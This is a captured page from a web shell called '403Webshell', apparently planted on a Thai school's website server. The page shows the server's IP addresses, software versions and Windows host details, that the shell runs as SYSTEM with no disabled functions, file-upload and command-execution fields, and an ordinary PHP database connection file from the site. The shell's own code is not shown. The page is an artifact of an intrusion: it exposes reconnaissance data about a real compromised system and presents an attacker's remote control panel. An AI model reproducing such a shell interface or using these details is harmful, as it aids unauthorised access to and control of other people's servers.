403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/thamuang/modules/useronline/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/thamuang/modules/useronline/startconnect.php
<?

// - - - - - - - - - - เริ่มการติดต่อฐานข้อมูล - - - - - - - - - - //

// กำหนดชื่อเซิร์ฟเวอร์ , ชื่อฐานข้อมูล , ชื่อผู้ใช้งาน  และ รหัสผ่าน สำหรับติดต่อกับฐานข้อมูล
$ServerName = "".DB_HOST."";
$DatabaseName = "".DB_NAME."";
$User = "".DB_USERNAME."";
$Password = "".DB_PASSWORD."";

$startdate = "".WEB_TIMESTART.""; // วันที่เริ่มต้นนับจำนวนสมาชิก
$time_delay = 600; // นับจำนวนเข้าชมขณะนี้ ในช่วงเวลา 10 นาที ( 600 วินาที )
		
// ติดต่อกับฐานข้อมูลผ่านฟังก์ชันของ MySQL
$Conn = mysql_connect($ServerName,$User,$Password) or die ("ไม่สามารถติดต่อกับเซิร์ฟเวอร์ได้");
mysql_select_db($DatabaseName,$Conn) or die ("ไม่สามารถติดต่อกับฐานข้อมูลได้");

?>

Youez - 2016 - github.com/yon3zu
LinuXploit